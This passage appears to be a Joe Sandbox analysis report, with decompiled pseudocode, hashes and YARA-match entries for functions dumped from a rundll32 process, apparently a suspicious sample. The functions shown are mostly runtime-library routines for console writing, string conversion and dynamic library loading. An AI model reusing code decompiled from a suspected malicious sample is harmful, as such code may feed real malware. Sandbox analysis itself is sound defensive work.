                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID:
                • API String ID: 3215553584-0
                • Opcode ID: 52d99cb5615afe62c5ecdb2a2b3b8332668bb0552d9714908df8974f14046c50
                • Instruction ID: 167f90814dccb2ad2de1ac4f7b6e8b8f9dd09b057f07d105ee0329fc44acfe06
                • Opcode Fuzzy Hash: 52d99cb5615afe62c5ecdb2a2b3b8332668bb0552d9714908df8974f14046c50
                • Instruction Fuzzy Hash: C981CA33712E60C9FB309F2598887EDA7B5BFE4B98F244185DE0A537A9DB34A945C310
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535EBAB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _set_statfp
                • String ID:
                • API String ID: 1156100317-0
                • Opcode ID: 9a481b7797b83caa62ae56b9bfc09498f8646f626c0c1df2f8e84da70a781739
                • Instruction ID: ddc47afb5f21660ea1829566c097fa29323be1bd51b716aa6a85a46be5e7c1d3
                • Opcode Fuzzy Hash: 9a481b7797b83caa62ae56b9bfc09498f8646f626c0c1df2f8e84da70a781739
                • Instruction Fuzzy Hash: E551D926D2CF5A49F2229F34A45037A626BBFC2351F0CD275DA5E365D4EF3CA445A600
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215206128A8 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                Download Yara Rule
                C-Code - Quality: 23%
                			E00000215215206128A8(signed int __ecx, long long __rbx, signed int __rcx, void* __rdx, signed int __r8, char _a8, long long _a16, unsigned int _a32, unsigned int _a36, signed short _a38) {
				signed short _t34;
				unsigned int _t37;
				unsigned int _t38;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed int _t47;
				void* _t55;
				unsigned int _t56;
				void* _t63;
				signed int _t69;
				signed int _t70;
				void* _t73;
				signed int _t74;
				void* _t75;
				signed int _t79;
				signed int _t82;
				signed long long _t86;
				void* _t102;
				void* _t103;

				_a16 = __rbx;
				r14d = 0;
				asm("movaps [esp+0x20], xmm6");
				_t43 = __ecx & 0x0000001f;
				r12d = __ecx;
				_t2 = _t103 + 0x10; // 0x10
				r13d = _t2;
				if ((__ecx & 0x00000008) == 0) goto 0x206128f1;
				if (r15b >= 0) goto 0x206128f1;
				E00000215215206131F4(_t43, __rcx);
				_t44 = _t43 & 0xfffffff7;
				goto 0x20612ad1;
				_t69 = 0x00000004 & r12b;
				if (_t69 == 0) goto 0x2061290f;
				asm("dec ecx");
				if (_t69 >= 0) goto 0x2061290f;
				E00000215215206131F4(_t44, __rcx);
				_t45 = _t44 & 0xfffffffb;
				goto 0x20612ad1;
				_t70 = dil & r12b;
				if (_t70 == 0) goto 0x206129cd;
				asm("dec ecx");
				if (_t70 >= 0) goto 0x206129cd;
				E00000215215206131F4(_t45, __rcx);
				_t86 = __r8 & __rcx;
				if (_t70 == 0) goto 0x2061299a;
				if (_t86 == 0x2000) goto 0x20612982;
				if (_t86 == 0x4000) goto 0x2061296a;
				_t73 = _t86 - __rcx;
				if (_t73 != 0) goto 0x206129c5;
				asm("movsd xmm0, [esi]");
				asm("comisd xmm0, [0x1e8b2]");
				asm("movsd xmm0, [0x234a2]");
				if (_t73 > 0) goto 0x206129c1;
				goto 0x206129ba;
				asm("movsd xmm0, [esi]");
				asm("comisd xmm0, [0x1e89a]");
				if (_t73 > 0) goto 0x206129a8;
				asm("movsd xmm0, [0x23488]");
				goto 0x206129ba;
				asm("movsd xmm0, [esi]");
				asm("comisd xmm0, [0x1e882]");
				if (_t73 <= 0) goto 0x206129b2;
				asm("movsd xmm0, [0x23470]");
				goto 0x206129c1;
				asm("movsd xmm0, [esi]");
				asm("comisd xmm0, [0x1e86a]");
				if (_t73 <= 0) goto 0x206129b2;
				asm("movsd xmm0, [0x23450]");
				goto 0x206129c1;
				asm("movsd xmm0, [0x23446]");
				asm("xorps xmm0, [0x2fd4f]");
				asm("movsd [esi], xmm0");
				_t46 = _t45 & 0xfffffffe;
				goto 0x20612ad1;
				_t74 = r12b & 0x00000002;
				if (_t74 == 0) goto 0x20612ad1;
				asm("dec ecx");
				if (_t74 >= 0) goto 0x20612ad1;
				asm("movsd xmm0, [edx]");
				asm("xorps xmm6, xmm6");
				_t63 =  !=  ? 1 : r14d;
				asm("ucomisd xmm0, xmm6");
				if (_t74 != 0) goto 0x20612a04;
				if (_t74 != 0) goto 0x20612a04;
				goto 0x20612ac2;
				_t34 = E0000021521520612F78(r12b & r13b, _t74,  &_a8);
				_t55 = _a8 + 0xfffffa00;
				asm("movsd [esp+0x88], xmm0");
				_t75 = _t55 - 0xfffffbce;
				if (_t75 >= 0) goto 0x20612a34;
				asm("mulsd xmm0, xmm6");
				goto 0x20612abe;
				r8d = r14d;
				asm("comisd xmm6, xmm0");
				r8b = _t75 > 0;
				_a38 = _t34 & 0x0000000f | r13w;
				if (_t55 - 0xfffffc03 >= 0) goto 0x20612aa9;
				_t37 = _a32;
				_t56 = _a36;
				if ((dil & _t37) == 0) goto 0x20612a82;
				_t66 =  ==  ? 1 : 1;
				_t38 = _t37 >> 1;
				_a32 = _t38;
				_t79 = dil & _t56;
				if (_t79 == 0) goto 0x20612a9b;
				asm("bts eax, 0x1f");
				_a32 = _t38;
				if (_t79 != 0) goto 0x20612a78;
				_a36 = _t56 >> 1;
				asm("movsd xmm0, [esp+0x88]");
				if (r8d == 0) goto 0x20612abe;
				asm("xorps xmm0, [0x2fc52]");
				asm("movsd [esi], xmm0");
				_t81 =  ==  ? 1 : 1;
				if (( ==  ? 1 : 1) == 0) goto 0x20612ace;
				E00000215215206131F4(_t46, _t102);
				_t47 = _t46 & 0xfffffffd;
				_t82 = r13b & r12b;
				if (_t82 == 0) goto 0x20612aea;
				asm("dec ecx");
				if (_t82 >= 0) goto 0x20612aea;
				E00000215215206131F4(_t47, _t102);
				asm("movaps xmm6, [esp+0x20]");
				r14b = (_t47 & 0xffffffef) == 0;
				return r14d;
			}
























                0x215206128a8
                0x215206128bc
                0x215206128bf
                0x215206128c9
                0x215206128cf
                0x215206128d2
                0x215206128d2
                0x215206128d9
                0x215206128de
                0x215206128e4
                0x215206128e9
                0x215206128ec
                0x215206128f6
                0x215206128f9
                0x215206128fb
                0x21520612900
                0x21520612902
                0x21520612907
                0x2152061290a
                0x21520612914
                0x21520612917
                0x2152061291d
                0x21520612922
                0x2152061292b
                0x21520612938
                0x2152061293b
                0x21520612943
                0x2152061294b
                0x2152061294d
                0x21520612950
                0x21520612952
                0x21520612956
                0x2152061295e
                0x21520612966
                0x21520612968
                0x2152061296a
                0x2152061296e
                0x21520612976
                0x21520612978
                0x21520612980
                0x21520612982
                0x21520612986
                0x2152061298e
                0x21520612990
                0x21520612998
                0x2152061299a
                0x2152061299e
                0x215206129a6
                0x215206129a8
                0x215206129b0
                0x215206129b2
                0x215206129ba
                0x215206129c1
                0x215206129c5
                0x215206129c8
                0x215206129cd
                0x215206129d1
                0x215206129d7
                0x215206129dc
                0x215206129e2
                0x215206129ef
                0x215206129f2
                0x215206129f5
                0x215206129f9
                0x215206129fb
                0x215206129ff
                0x21520612a09
                0x21520612a12
                0x21520612a18
                0x21520612a21
                0x21520612a27
                0x21520612a29
                0x21520612a2f
                0x21520612a3c
                0x21520612a3f
                0x21520612a43
                0x21520612a53
                0x21520612a61
                0x21520612a63
                0x21520612a71
                0x21520612a7b
                0x21520612a7f
                0x21520612a82
                0x21520612a84
                0x21520612a8b
                0x21520612a8e
                0x21520612a90
                0x21520612a94
                0x21520612aa0
                0x21520612aa2
                0x21520612aa9
                0x21520612ab5
                0x21520612ab7
                0x21520612abe
                0x21520612ac2
                0x21520612ac4
                0x21520612ac9
                0x21520612ace
                0x21520612ad1
                0x21520612ad4
                0x21520612ad6
                0x21520612adb
                0x21520612ae2
                0x21520612aea
                0x21520612af6
                0x21520612b0c

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _set_statfp
                • String ID:
                • API String ID: 1156100317-0
                • Opcode ID: 509265f950abf2e7e2260dcf5cdcd31c2f65a8f817b08dd6b93b0e5f940dfdf5
                • Instruction ID: 62ddc35c9d206bbebcc2882e6e5f38665633699dd5ce5cfe5f14b1a81515be0e
                • Opcode Fuzzy Hash: 509265f950abf2e7e2260dcf5cdcd31c2f65a8f817b08dd6b93b0e5f940dfdf5
                • Instruction Fuzzy Hash: 8A51D833106E69C5FE369F39A4583EAE260FFF1750F3486919E56263DCDB34A4A18E00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F3CEC Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                Download Yara Rule
                C-Code - Quality: 25%
                			E00007FFA7FFA535F3CEC(signed int __edx, void* __edi, void* __esi, long long __rbx, long long* __rcx, void* __rdx, long long __r8, void* __r9, long long _a8) {
				signed long long _v72;
				char _v80;
				intOrPtr _v87;
				char _v88;
				long long _v96;
				long long _v104;
				long long _v108;
				long long _v112;
				int _v116;
				char _v120;
				signed long long _v128;
				signed long long _v136;
				long long _v144;
				signed int _v152;
				int _t76;
				int _t77;
				long _t80;
				signed char _t81;
				signed int _t87;
				signed long long _t99;
				intOrPtr _t103;
				signed int _t104;
				long long _t106;
				long long* _t109;
				intOrPtr _t126;
				intOrPtr* _t138;
				signed long long _t141;
				void* _t143;
				void* _t151;
				void* _t152;
				signed long long _t156;

				_a8 = __rbx;
				_t99 =  *0x53754140; // 0x3c63485c5c92
				_v72 = _t99 ^ _t143 - 0x00000080;
				r12d = r9d;
				_t156 = __edx >> 6;
				_t141 = (__edx & 0x0000003f) << 6;
				_v96 = __r8;
				_t109 = __rcx;
				_t152 = _t151 + __r8;
				_t103 =  *((intOrPtr*)( *((intOrPtr*)(0x53754e50 + _t156 * 8)) + _t141 + 0x28));
				_v104 = 0x53754e50;
				GetConsoleCP();
				_v108 = 0x53754e50;
				 *__rcx = 0;
				 *((long long*)(__rcx + 8)) = 0;
				if (__r8 - _t152 >= 0) goto 0x535f3eca;
				r13b =  *((intOrPtr*)(__r8));
				_v120 = __edx;
				_t126 =  *((intOrPtr*)(0x53754e50 + _t156 * 8));
				_t81 =  *(_t126 + _t141 + 0x3d);
				_t87 = _t81 & 0x00000004;
				if (_t87 == 0) goto 0x535f3d9f;
				 *(_t126 + _t141 + 0x3d) = _t81 & 0x000000fb;
				r8d = 2;
				_v88 =  *((intOrPtr*)(_t126 + _t141 + 0x3e));
				_v87 = r13b;
				goto 0x535f3de4;
				E00007FFA7FFA535ED520(_t81 & 0x000000fb, __edx, _t103, __rcx, __rcx,  &_v88, __r9);
				if (_t87 == 0) goto 0x535f3ddb;
				if (__r8 - _t152 >= 0) goto 0x535f3eaa;
				r8d = 2;
				E00007FFA7FFA535EFBE0(__edx, _t103,  &_v120);
				if (0x53754e50 == 0xffffffff) goto 0x535f3eca;
				goto 0x535f3df6;
				r8d = 1;
				E00007FFA7FFA535EFBE0(__edx, _t103,  &_v120);
				if (_t103 == 0xffffffff) goto 0x535f3eca;
				_v128 = _v128 & 0x00000000;
				_t104 =  &_v80;
				_v136 = _v136 & 0x00000000;
				r9d = 1;
				_v144 = 5;
				_v152 = _t104;
				_t138 = __r8 + 2;
				_t76 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
				r14d = _t76;
				if (_t104 == 0) goto 0x535f3eca;
				_v152 = _v152 & 0x00000000;
				r8d = _t76;
				_t77 = WriteFile(??, ??, ??, ??, ??);
				if (_t104 == 0) goto 0x535f3ec2;
				 *((long long*)(_t109 + 4)) =  *((intOrPtr*)(_t109 + 8)) - _v96 + _t138;
				if (_v112 - r14d < 0) goto 0x535f3eca;
				if (r13b != 0xa) goto 0x535f3ea2;
				_v152 = 0;
				r8d = 1;
				_v116 = _t77;
				WriteFile(??, ??, ??, ??, ??);
				if (0xd == 0) goto 0x535f3ec2;
				if (_v112 - 1 < 0) goto 0x535f3eca;
				 *((long long*)(_t109 + 8)) =  *((long long*)(_t109 + 8)) + 1;
				 *((long long*)(_t109 + 4)) =  *((long long*)(_t109 + 4)) + 1;
				goto 0x535f3d60;
				 *((char*)( *((intOrPtr*)(0x53754e50 + _t156 * 8)) + _t141 + 0x3e)) =  *_t138;
				_t106 =  *((intOrPtr*)(0x53754e50 + _t156 * 8));
				 *(_t106 + _t141 + 0x3d) =  *(_t106 + _t141 + 0x3d) | 0x00000004;
				 *((long long*)(_t109 + 4)) =  *((long long*)(_t109 + 4)) + 1;
				goto 0x535f3eca;
				_t80 = GetLastError();
				 *_t109 = _t106;
				E00007FFA7FFA535F51E0();
				return _t80;
			}


































                0x7ffa535f3cec
                0x7ffa535f3d06
                0x7ffa535f3d10
                0x7ffa535f3d21
                0x7ffa535f3d24
                0x7ffa535f3d2b
                0x7ffa535f3d32
                0x7ffa535f3d36
                0x7ffa535f3d39
                0x7ffa535f3d40
                0x7ffa535f3d45
                0x7ffa535f3d49
                0x7ffa535f3d51
                0x7ffa535f3d54
                0x7ffa535f3d5a
                0x7ffa535f3d60
                0x7ffa535f3d66
                0x7ffa535f3d70
                0x7ffa535f3d74
                0x7ffa535f3d78
                0x7ffa535f3d7c
                0x7ffa535f3d7f
                0x7ffa535f3d88
                0x7ffa535f3d8c
                0x7ffa535f3d96
                0x7ffa535f3d99
                0x7ffa535f3d9d
                0x7ffa535f3d9f
                0x7ffa535f3db0
                0x7ffa535f3db5
                0x7ffa535f3dbb
                0x7ffa535f3dc8
                0x7ffa535f3dd0
                0x7ffa535f3dd9
                0x7ffa535f3ddb
                0x7ffa535f3de8
                0x7ffa535f3df0
                0x7ffa535f3df6
                0x7ffa535f3dfc
                0x7ffa535f3e00
                0x7ffa535f3e0d
                0x7ffa535f3e13
                0x7ffa535f3e1d
                0x7ffa535f3e22
                0x7ffa535f3e25
                0x7ffa535f3e2b
                0x7ffa535f3e30
                0x7ffa535f3e3e
                0x7ffa535f3e48
                0x7ffa535f3e4b
                0x7ffa535f3e55
                0x7ffa535f3e5f
                0x7ffa535f3e66
                0x7ffa535f3e6c
                0x7ffa535f3e75
                0x7ffa535f3e7a
                0x7ffa535f3e82
                0x7ffa535f3e8a
                0x7ffa535f3e94
                0x7ffa535f3e9a
                0x7ffa535f3e9c
                0x7ffa535f3e9f
                0x7ffa535f3ea5
                0x7ffa535f3eb0
                0x7ffa535f3eb4
                0x7ffa535f3eb8
                0x7ffa535f3ebd
                0x7ffa535f3ec0
                0x7ffa535f3ec2
                0x7ffa535f3ec8
                0x7ffa535f3ed4
                0x7ffa535f3ef3

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                • String ID:
                • API String ID: 3659116390-0
                • Opcode ID: 83dccb9937e3ac222778909160735bcc582b8dc578fbd95a744c34ed9864d015
                • Instruction ID: e3d35f6fcd6e256d735954e834aef5e91b0fb3d651fe4a3d538b3c1449825c07
                • Opcode Fuzzy Hash: 83dccb9937e3ac222778909160735bcc582b8dc578fbd95a744c34ed9864d015
                • Instruction Fuzzy Hash: 18518F72B24A5189F710CB65E4443AD3BBAFB86B98F089135DF4E676A8DF38D145C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520617244 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                • String ID:
                • API String ID: 3659116390-0
                • Opcode ID: b9be7c7290749fa8c754aeb00266509b5afe0e1b26437b27dc51158f4b04a1a9
                • Instruction ID: 47665ffa76819a35c101efbd1e1a608eb4c993aa0034f220538d7b89fa91f854
                • Opcode Fuzzy Hash: b9be7c7290749fa8c754aeb00266509b5afe0e1b26437b27dc51158f4b04a1a9
                • Instruction Fuzzy Hash: FB519C33A11A60C9EB24CF75E8483ED7BB0FB98B98F288155DE4A47B98DB34D156C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152060E42C Relevance: 7.6, APIs: 5, Instructions: 133COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 35%
                			E000002152152060E42C(void* __edx, void* __esi, intOrPtr __ebp, long long __rbx, char* __rcx, signed char* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9) {
				void* _v24;
				intOrPtr _v32;
				void* _v48;
				char _v56;
				intOrPtr _v64;
				char* _v72;
				void* _t35;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed long long _t79;
				intOrPtr* _t82;
				long long _t84;
				char* _t103;
				signed char* _t106;
				signed long long _t113;
				char* _t122;
				int _t124;
				signed char* _t125;
				int _t127;

				_t84 = __rbx;
				_t79 = _t113;
				 *((long long*)(_t79 + 8)) = __rbx;
				 *((long long*)(_t79 + 0x10)) = __rbp;
				 *((long long*)(_t79 + 0x18)) = __rsi;
				 *((long long*)(_t79 + 0x20)) = __rdi;
				r12d = 0;
				_t125 = __rdx;
				_t46 = r12d;
				if (__rcx == 0) goto 0x2060e46d;
				if (__r8 != 0) goto 0x2060e469;
				goto 0x2060e5e9;
				 *__rcx = r12w;
				if (__rdx != 0) goto 0x2060e48b;
				_t35 = E0000021521520603944(_t79);
				 *_t79 = 0x16;
				E00000215215205FAABC(_t35);
				goto 0x2060e5e9;
				E00000215215205FA5D4(_t79 | 0xffffffff, __rbx,  &_v56, __r9);
				if (__rcx == 0) goto 0x2060e585;
				if ( *((intOrPtr*)(_v48 + 0x138)) != _t122) goto 0x2060e4db;
				if (__r8 == 0) goto 0x2060e5d3;
				 *__rcx =  *(_t84 + _t125) & 0x000000ff;
				if ( *(_t84 + _t125) == r12b) goto 0x2060e5d3;
				_t103 =  &(__rcx[2]);
				if (_t84 + 1 - __r8 < 0) goto 0x2060e4b8;
				goto 0x2060e5d3;
				_v64 = __ebp;
				r9d = _t46;
				_v72 = _t103;
				if (MultiByteToWideChar(_t127, _t124, _t122) != 0) goto 0x2060e5cf;
				if (GetLastError() != 0x7a) goto 0x2060e56f;
				r15d = __ebp;
				_t106 = _t125;
				if (__ebp == 0) goto 0x2060e543;
				r15d = r15d - 1;
				if ( *_t106 == r12b) goto 0x2060e543;
				if (E000002152152060E924( *_t106 & 0x000000ff,  *_t106 - r12b, _v48,  &_v48) == 0) goto 0x2060e53b;
				if (_t106[1] == r12b) goto 0x2060e56f;
				goto 0x2060e518;
				_t82 = _v48;
				_v64 = __ebp;
				r9d = __esi - r14d;
				_v72 = _t103;
				_t42 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_t42 != 0) goto 0x2060e580;
				E0000021521520603944(_t82);
				 *_t82 = 0x2a;
				 *_t103 = r12w;
				goto 0x2060e5d3;
				goto 0x2060e5d3;
				if ( *((intOrPtr*)(_t82 + 0x138)) != _t122) goto 0x2060e59d;
				if (_t125[(_t42 | 0xffffffff) + 1] != r12b) goto 0x2060e592;
				goto 0x2060e5d3;
				r9d = _t46;
				_v64 = r12d;
				_v72 = _t122;
				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x2060e5cf;
				_t45 = E0000021521520603944(_t82);
				 *_t82 = 0x2a;
				goto 0x2060e5d3;
				if (_v32 == r12b) goto 0x2060e5e6;
				 *(_v56 + 0x3a8) =  *(_v56 + 0x3a8) & 0xfffffffd;
				return _t45;
			}























                0x2152060e42c
                0x2152060e42c
                0x2152060e42f
                0x2152060e433
                0x2152060e437
                0x2152060e43b
                0x2152060e449
                0x2152060e44f
                0x2152060e455
                0x2152060e45b
                0x2152060e460
                0x2152060e464
                0x2152060e469
                0x2152060e470
                0x2152060e472
                0x2152060e477
                0x2152060e47d
                0x2152060e486
                0x2152060e493
                0x2152060e4a0
                0x2152060e4ad
                0x2152060e4b2
                0x2152060e4bd
                0x2152060e4c4
                0x2152060e4cd
                0x2152060e4d4
                0x2152060e4d6
                0x2152060e4e2
                0x2152060e4e6
                0x2152060e4ec
                0x2152060e4ff
                0x2152060e50e
                0x2152060e510
                0x2152060e513
                0x2152060e518
                0x2152060e51a
                0x2152060e520
                0x2152060e531
                0x2152060e539
                0x2152060e541
                0x2152060e543
                0x2152060e54b
                0x2152060e54f
                0x2152060e555
                0x2152060e562
                0x2152060e56d
                0x2152060e56f
                0x2152060e574
                0x2152060e57a
                0x2152060e57e
                0x2152060e583
                0x2152060e590
                0x2152060e599
                0x2152060e59b
                0x2152060e5a0
                0x2152060e5a3
                0x2152060e5b0
                0x2152060e5c0
                0x2152060e5c2
                0x2152060e5c7
                0x2152060e5cd
                0x2152060e5d8
                0x2152060e5df
                0x2152060e607

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID:
                • API String ID: 3215553584-0
                • Opcode ID: 0992db94baf726fc03c3fe61251d28ebc32245833e53c1822b8499ec83bbddf5
                • Instruction ID: 04fb3de65d2012d00322216f67854188deb74afae924e78341e3f057ea010014
                • Opcode Fuzzy Hash: 0992db94baf726fc03c3fe61251d28ebc32245833e53c1822b8499ec83bbddf5
                • Instruction Fuzzy Hash: C451E673266BB0C5EB718F51A8483AA77A6FFE0BA4F3846659E65037D8EA35D410C301
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535ED718 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 34%
                			E00007FFA7FFA535ED718(void* __ecx, long long __rbx, void* __rdx, long long __rsi, intOrPtr* __r8, void* __r9) {
				signed long long _t61;
				signed long long _t65;
				intOrPtr _t68;
				signed long long _t82;
				struct HINSTANCE__* _t91;
				signed long long _t92;
				signed long long _t97;
				long long _t99;
				void* _t103;
				signed long long _t107;
				signed long long _t109;
				signed long long _t112;
				struct HINSTANCE__* _t113;
				long _t116;
				void* _t119;
				WCHAR* _t121;

				 *((long long*)(_t103 + 8)) = __rbx;
				 *((long long*)(_t103 + 0x10)) = _t99;
				 *((long long*)(_t103 + 0x18)) = __rsi;
				r14d = __ecx;
				_t109 =  *0x53754140; // 0x3c63485c5c92
				_t92 = _t91 | 0xffffffff;
				_t82 = _t109 ^  *(0x7ffa535e0000 + 0x1755f0 + _t119 * 8);
				asm("dec eax");
				if (_t82 == _t92) goto 0x535ed899;
				if (_t82 == 0) goto 0x535ed781;
				_t61 = _t82;
				goto 0x535ed89b;
				if (__r8 == __r9) goto 0x535ed82d;
				_t97 =  *((intOrPtr*)(__r8));
				_t68 =  *((intOrPtr*)(0x7ffa535e0000 + 0x175550 + _t97 * 8));
				if (_t68 == 0) goto 0x535ed7a1;
				if (_t68 == _t92) goto 0x535ed819;
				goto 0x535ed814;
				r8d = 0x800;
				LoadLibraryExW(_t121, _t119, _t116);
				if (_t61 != 0) goto 0x535ed7e2;
				GetLastError();
				if (_t61 != 0x57) goto 0x535ed7e0;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				goto 0x535ed7e2;
				if (0 != 0) goto 0x535ed7fb;
				 *((intOrPtr*)(0x7ffa535e0000 + 0x175550 + _t97 * 8)) = _t92;
				goto 0x535ed819;
				_t19 = 0x7ffa535e0000 + 0x175550 + _t97 * 8;
				_t65 =  *_t19;
				 *_t19 = 0;
				if (_t65 == 0) goto 0x535ed814;
				FreeLibrary(_t113);
				if (0 != 0) goto 0x535ed86e;
				if (__r8 + 4 != __r9) goto 0x535ed78a;
				if (0 == 0) goto 0x535ed87e;
				GetProcAddress(_t91);
				if (_t65 == 0) goto 0x535ed877;
				_t107 =  *0x53754140; // 0x3c63485c5c92
				asm("loope 0x41");
				asm("dec eax");
				 *(0x7ffa535e0000 + 0x1755f0 + _t119 * 8) = _t65 ^ _t107;
				goto 0x535ed89b;
				goto 0x535ed82f;
				_t112 =  *0x53754140; // 0x3c63485c5c92
				asm("enter 0xd348, 0xcf");
				 *(0x7ffa535e0000 + 0x1755f0 + _t119 * 8) = _t92 ^ _t112;
				return r10d;
			}



















                0x7ffa535ed718
                0x7ffa535ed71d
                0x7ffa535ed722
                0x7ffa535ed734
                0x7ffa535ed74f
                0x7ffa535ed756
                0x7ffa535ed760
                0x7ffa535ed768
                0x7ffa535ed76e
                0x7ffa535ed777
                0x7ffa535ed779
                0x7ffa535ed77c
                0x7ffa535ed784
                0x7ffa535ed78a
                0x7ffa535ed78d
                0x7ffa535ed798
                0x7ffa535ed79d
                0x7ffa535ed79f
                0x7ffa535ed7ae
                0x7ffa535ed7b4
                0x7ffa535ed7c0
                0x7ffa535ed7c2
                0x7ffa535ed7cb
                0x7ffa535ed7cd
                0x7ffa535ed7d5
                0x7ffa535ed7de
                0x7ffa535ed7ec
                0x7ffa535ed7f1
                0x7ffa535ed7f9
                0x7ffa535ed7fe
                0x7ffa535ed7fe
                0x7ffa535ed7fe
                0x7ffa535ed809
                0x7ffa535ed80e
                0x7ffa535ed817
                0x7ffa535ed820
                0x7ffa535ed832
                0x7ffa535ed83a
                0x7ffa535ed843
                0x7ffa535ed845
                0x7ffa535ed855
                0x7ffa535ed85e
                0x7ffa535ed864
                0x7ffa535ed86c
                0x7ffa535ed875
                0x7ffa535ed877
                0x7ffa535ed88a
                0x7ffa535ed891
                0x7ffa535ed8b7

                APIs
                • GetProcAddress.KERNEL32(?,00003C63485C5C92,FFFFFFFF,00007FFA535EDAE3,?,?,00000000,00007FFA535E8B23,?,?,00003C63485C5C92,00007FFA535E8389), ref: 00007FFA535ED83A
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: AddressProc
                • String ID:
                • API String ID: 190572456-0
                • Opcode ID: 5dc0bb12abbf4a7a14033368e2d0c6602d9198ce90f65ce4c3b152005258811c
                • Instruction ID: e52e3fb4c5b8affbfb8a43defc3987157ecd289b4e0e31051c91c42c01c15d51
                • Opcode Fuzzy Hash: 5dc0bb12abbf4a7a14033368e2d0c6602d9198ce90f65ce4c3b152005258811c
                • Instruction Fuzzy Hash: D9411361F2AF428DFA159B12A80463523DBBF96B90F0DE534DD1D6B394EE3CE4049340
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152060C60C Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 36%
